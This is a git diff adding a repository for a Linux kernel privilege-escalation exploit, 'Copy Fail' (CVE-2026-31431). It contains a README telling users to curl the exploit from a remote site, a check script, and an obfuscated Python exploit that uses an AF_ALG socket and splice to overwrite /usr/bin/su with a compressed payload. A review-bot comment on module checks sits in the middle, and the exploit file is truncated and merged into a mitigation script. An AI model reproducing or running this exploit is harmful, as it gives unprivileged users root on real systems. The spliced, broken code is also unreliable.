diff --git a/README.md b/README.md
index e69de29..fbaa12e 100644
--- a/README.md
+++ b/README.md
@@ -0,0 +1,25 @@
+# Copy Fail - CVE-2026-31431
+
+[Technical Writeup](https://xint.io/blog/copy-fail-linux-distributions)
+
+## Tested Distro / Version
+
+| Distro | Version |
+|-------------------|-------------------------|
+| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
+| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
+| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
+| SUSE 16 | 6.12.0-160000.9-default |
+| Rocky Linux 9.7 (Blue Onyx) | 5.14.0-611.49.1.el9_7.x86_64 |
+
+
+## Files
+check.sh - makes a check to see if the exploitable crypto module is loaded.
+mitigate.sh - unloads the exploitable crypto module, chances are you didnt need it anyway.
+
+copy_fail_exp.py - the exploit in pure python.
+
+
+run to get the file as a non-privilaged user.
+
+ curl https://copy.fail/exp
diff --git a/check.sh b/check.sh
new file mode 100755
index 0000000..5ced9e6
--- /dev/null
+++ b/check.sh
@@ -0,0 +1,2 @@
+lsmod | grep algif_aead
+cat /etc/modprobe.d/disable-algif.conf
diff --git a/copy_fail_exp.py b/copy_fail_exp.py
new file mode 100644
index 0000000..f69386d
--- /dev/null
+++ b/copy_fail_exp.py
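Review bot: `lsmod | grep algif_aead` on the first line of check.sh only reports whether the module is loaded at this moment, so an empty result is not evidence that a host is unaffected: on a stock kernel algif_aead is usually absent until the first AF_ALG bind, at which point the kernel requests the module and it is loaded on demand. A dry run of the kernel's own load path, `modprobe -n -v algif_aead`, shows whether that request would succeed under the current modprobe.d configuration and is the check that answers the question the README asks; pairing it with `grep -q '^algif_aead' /proc/modules` also gives the script a meaningful exit status instead of relying on the text grep and cat happen to print. The second line's `cat` prints an error when `/etc/modprobe.d/disable-algif.conf` does not exist, so `cat /etc/modprobe.d/disable-algif.conf 2>/dev/null || echo "no modprobe.d override present"` is clearer for a user reading the output. The contents written to that file are not visible in this chunk; if it holds only a `blacklist algif_aead` line, note that per modprobe.d(5) `blacklist` suppresses the module's aliases but not a request for it by name, whereas `install algif_aead /bin/false` refuses both, so the check should verify that an `install` directive is present rather than that the file merely exists.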
@@ -0,0 +1,10 @@ +#!/usr/bin/env python3 +import os as g,zlib,socket as s +def d(x):return bytes.fromhex(x) +def c(f,t,c): + a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) + try:u.recv(8+t) + except:0 +f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) +while i /etc/modprobe.d/disable-algif.conf +rmmod algif_aead 2>/dev/null || true + +lsmod | grep algif_aead +cat /etc/modprobe.d/disable-algif.conf